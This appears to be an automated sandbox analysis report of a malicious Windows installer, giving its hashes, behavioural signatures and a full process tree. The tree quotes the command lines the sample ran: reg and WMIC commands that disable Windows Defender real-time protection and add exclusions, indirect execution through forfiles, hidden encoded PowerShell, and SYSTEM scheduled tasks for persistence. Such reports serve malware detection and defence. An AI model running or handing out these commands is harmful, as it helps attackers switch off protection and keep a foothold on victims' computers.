Analysis

  • max time kernel
    94s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/08/2024, 22:38

General

  • Target

    634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe

  • Size

    7.3MB

  • MD5

    ace0b015f1fdcb6fa55bf1fc1a447dd4

  • SHA1

    602ffe036d9bbed14f4230ade5494efecb153834

  • SHA256

    634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56

  • SHA512

    8bcec61dec5739fffa5b2fd0a92699016cb778709f482fc8144449c4b414aa2632c1d81f4f010836ef1f19edac69843f76af64eb08d49c9fe3315b214af72657

  • SSDEEP

    196608:91O9GnorlTq8z+dgAZNHk05e1n2zosorKjfkB:3OQopGAl+Nf5ei4mzkB

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell with its display window hidden.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe
    "C:\Users\Admin\AppData\Local\Temp\634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Users\Admin\AppData\Local\Temp\7zSCF12.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Users\Admin\AppData\Local\Temp\7zSD105.tmp\Install.exe
        .\Install.exe /TWZIzdidDdU "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1784
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2940
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2784
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2680
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:296
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2712
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2772
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2832
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                PID:2320
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                    PID:2364
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2180
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  5⤵
                  • Indirect Command Execution
                  PID:2232
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                      PID:2472
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:2448
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:2864
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                        PID:2808
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2884
                          • C:\Windows\SysWOW64\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            8⤵
                              PID:2656
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                      4⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:1352
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        5⤵
                          PID:944
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2036
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              7⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1116
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /CREATE /TN "bQeBRIfYCApeQZGKek" /SC once /ST 22:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe\" 4e /ztzDdidpucJ 525403 /S" /V1 /F
                        4⤵
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:2144
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 508
                        4⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:2908
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {9EF94694-B88B-400A-B2E3-FF15838FDD20} S-1-5-18:NT AUTHORITY\System:Service:
                  1⤵
                    PID:2996
                    • C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe
                      C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc\TGxOdjVHuAohYJs\rZHgSAw.exe 4e /ztzDdidpucJ 525403 /S
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:1516
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        3⤵
                          PID:2160
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1976
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              5⤵
                                PID:2340
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  6⤵
                                    PID:2092
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                4⤵
                                • Indirect Command Execution
                                PID:1728
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  5⤵
                                    PID:1624
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      6⤵
                                        PID:1308
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                    4⤵
                                    • Indirect Command Execution
                                    PID:1560
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      5⤵
                                        PID:1648
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          6⤵
                                            PID:1812
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                        4⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:1660
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          5⤵
                                            PID:1828
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3060
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          4⤵
                                          • Indirect Command Execution
                                          • System Location Discovery: System Language Discovery
                                          PID:1672
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                            5⤵
                                              PID:2148
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2104
                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                  7⤵
                                                    PID:2300
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "gRdMakNMU" /SC once /ST 00:59:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                            3⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2432
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn "gRdMakNMU"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:876
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "gRdMakNMU"
                                            3⤵
                                              PID:2740
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                              3⤵
                                                PID:992
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                  4⤵
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1676
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                3⤵
                                                  PID:1472
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                    4⤵
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    PID:1788
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "gRfVcomiq" /SC once /ST 20:03:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                  3⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1680
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /run /I /tn "gRfVcomiq"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2560
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /DELETE /F /TN "gRfVcomiq"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2912
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                  3⤵
                                                  • Indirect Command Execution
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2372
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                    4⤵
                                                      PID:2828
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                        5⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Drops file in System32 directory
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1324
                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                          6⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3040
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                      PID:2540
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • Windows security bypass
                                                        PID:2516
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:2492
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                          • Windows security bypass
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1588
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1936
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:3032
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                            PID:2120
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3028
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C copy nul "C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2800
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies data under HKEY_USERS
                                                            PID:1316
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2656
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2352
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2952
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2340
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1728
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1560
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1100
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2436
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2104
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3064
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2628
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:3004
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:408
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:928
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
